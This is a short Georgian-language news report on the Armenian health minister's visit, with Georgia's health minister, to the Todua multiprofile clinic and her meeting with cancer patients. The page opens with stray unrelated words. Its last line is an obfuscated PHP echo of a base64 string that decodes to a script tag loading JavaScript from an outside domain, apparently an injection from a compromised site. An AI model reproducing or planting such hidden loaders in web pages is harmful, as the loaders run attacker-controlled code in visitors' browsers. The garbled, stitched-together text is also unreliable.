celsiusi
ავერსი შნაიდერი

 საქართველოში ვიზიტის ფარგლებში, სომხეთის ჯანდაცვის მინისტრი, მიხეილ სარჯველაძესთან ერთად, თოდუას მრავალპროფილურ კლინიკაში იმყოფებოდა. ანაჰიტ ავანესიანი, ადგილზე, გაეცნო სამედიცინო ცენტრის მუშაობის სპეციფიკას და იმ სერვისებს, რასაც პაციენტები სახელმწიფო დაფინანსებით იღებენ.

კლინიკის გენერალურმა დირექტორმა, გიორგი წივწივაძემ, სომხეთის დელეგაციის წევრებს სხვადასხვა განყოფილებები დაათვალიერებინა და კლინიკაში არსებული თანამედროვე მიდგომებისა და აპარატურის შესახებ ინფორმაცია მიაწოდა.

თოდუას კლინიკაში ვიზიტისას, ჯანდაცვის მინისტრი ონკოპაციენტებსაც შეხვდა, რომლებმაც ონკოლოგიური მიმართულებით გატარებული ცვლილებებისთვის მინისტრს მადლობა გადაუხადეს და აღნიშნეს, რომ სერვისები მათთვის ბევრად ხელმისაწვდომი გახდა.

თოდუას კლინიკაში, მინისტრთან და სომხეთის დელეგაციასთან ერთად, მინისტრის მოადგილე თეა გიორგაძე და ჯანდაცვის კომიტეტის თავმჯდომარე ზაზა ლომინაძეც იმყოფებოდნენ.

146
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");